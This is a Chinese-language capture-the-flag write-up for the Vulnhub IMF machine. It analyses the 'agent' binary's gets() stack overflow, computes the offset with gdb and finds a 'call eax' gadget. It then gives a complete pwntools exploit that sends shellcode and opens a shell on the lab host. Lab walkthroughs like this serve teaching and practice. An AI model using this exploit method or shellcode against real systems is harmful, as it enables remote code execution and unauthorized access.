Vulnhub-IMF栈溢出详解

  • Comments Off on Vulnhub-IMF栈溢出详解
  • 15 views
  • A+

由于此靶机已被大佬们发过很多复现过程,这里主要介绍一下针对缓冲区溢出漏洞的思路。

一、文件分析

1.1 查看文件保护

首先使用 file 命令查看文件信息

file agent
checksec agent

wKg0C2FZq2WATJ3xAABWGLAAPa8217.png

可以看到文件基本信息:32 位、小端序、动态链接程序,且存在可读可写可执行段

1.2 伪代码分析

将 agent 文件拖入 32 位的 IDA 中进行分析
按 shift+f12 没找到 system('/bin/sh') 相关内容
按 F5 查看伪代码

```
int __cdecl main(int argc, const char argv, const char envp)
{
int result; // eax
char *s2; // [esp+8h] [ebp-20h] BYREF
char s[10]; // [esp+Eh] [ebp-1Ah] BYREF
int v6; // [esp+18h] [ebp-10h]
char v7; // [esp+1Fh] [ebp-9h]

setbuf(stdout, 0);
asprintf(&s2, "%i", 48093572);
//asprintf()可以说是一个增强版的sprintf(),在不确定字符串的长度时,能够根据格式化的字符串长度,申请足够的内存空间。

puts(" _ ");
puts(" |
_| / |
| Agent");
puts(" | || |/| | | Reporting");
puts(" |___|
| ||| Systemn");
printf("nAgent ID : ");
if ( !fgets(s, 9, stdin) )
return -1;
if ( !strncmp(s, s2, 8u) )//strncmp函数为字符串比较函数,功能是把 str1 和 str2 进行比较,最多比较前 n 个字节,若str1与str2的前n个字符相同,则返回0;若s1大于s2,则返回大于0的值;若s1 小于s2,则返回小于0的值。
{
do
v7 = getchar();
while ( v7 != 10 && v7 != -1 );
puts("Login Validated ");
v6 = menu();
switch ( v6 )
{
case 1:
extractionpoints();
break;
case 2:
requestextraction();
break;
case 3:
report();//溢出函数
break;
default:
puts("Exiting...");
break;
}
result = 0;
}
else
{
puts("Invalid Agent ID ");
result = -2;
}
return result;
}
```

下面是溢出函数 report

```
{
char s[152]; // [esp+4h] [ebp-A4h] BYREF
char *v2; // [esp+9Ch] [ebp-Ch]

printf("nEnter report update: ");
gets(s);//溢出点
printf("Report: %sn", s);
puts("Submitted for review.");
v2 = s;
return s;
}
```

看完伪代码后总结下,溢出的位置不难找,只要控制 report 中的 gets 函数读入填充的数据,即可产生栈溢出,但是没有 shellcode,需要我们自己写入 RWX 段,然后将函数的返回地址改为 shellcode 地址

1.3 gdb 分析

使用gdb分析,计算栈偏移,首先在fgets函数那里打个断点

wKg0C2FZrGAfEcuAADAMaiMaUE344.png

gdb ./agent
b *0x8048697
r
n

然后输入 48093572(这里主要是越过 strncmp 函数,需要让 S2 与 S 相同)

48093572

wKg0C2FZrUyAVHqsAADiNYAxi1g645.png

之后一直按 n 步过到 menu,输入 3 进入 report 函数

wKg0C2FZrVOAIWIKAAA6XEg84R4865.png

执行到 call report 这里步过之后,按 s 步入,之后继续步过到 gets 函数,输入'AAAAAAAA'

wKg0C2FZrWqAWppGAAFnD8O93oQ759.png

输入 stack48 在栈中找到 EBP 和字符串'AAAAAAAA'的位置

stack 48

输入的'AAAAAAAA'在 eax 中,位置如下:

wKg0C2FZrYmAEn8cAAB6lJaXRj0580.png

指向栈低的指针 EBP 位置如下:

wKg0C2FZrZiAHBsAAAB6WxtPI0w253.png

从而计算得出栈偏移为

栈偏移 = EBP地址 - 当前输入地址 + EBP字长
= 0xd188 - 0xd0e4 + 4 = 168

找到栈偏移之后,我们需要将 return 地址修改为 shellcode 地址,这里可以使用 ROPgadget 寻找包含 call eax 的代码段,这里找到 call eax 地址为 0x8048563

ROPgadget --binary agent | grep "call eax"

wKg0C2FZrbKAZr63AACmRwVxnaM466.png

二、EXP 编写

这里放上自己用 pwntools,通过 asm 构造 shellcode 内容,需要安装 pwntools 库,写完之后直接运行就 getshell 了

from pwn import *
io = remote("192.168.56.6", 7788) //需修改为靶机IP、端口
shellcode = asm(shellcraft.sh())//生成payload
shell_addr = 0x8048563//call eax的地址
io.recvuntil(b"Agent ID : ")
io.send(b"48093572n")//绕过strncmp函数
io.recvuntil(b"Enter selection: ")
io.send(b"3n") //选择进入report函数
io.recv()
io.sendline(shellcode + b"A" * (168 - len(shellcode)) + p32(shell_addr))
io.interactive()

python3 shell.exp

wKg0C2FZrbAUbZdAABv7N0UipY367.png

相关推荐: dirty cow分析

说明 比较老的一个漏洞,但是对新手来说还是很有分析价值,在这里分析了一下把主要逻辑做成了图的形式方便理解。 参考自 https://www.anquanke.com/post/id/84784 https://www.anquanke.com/post/id/…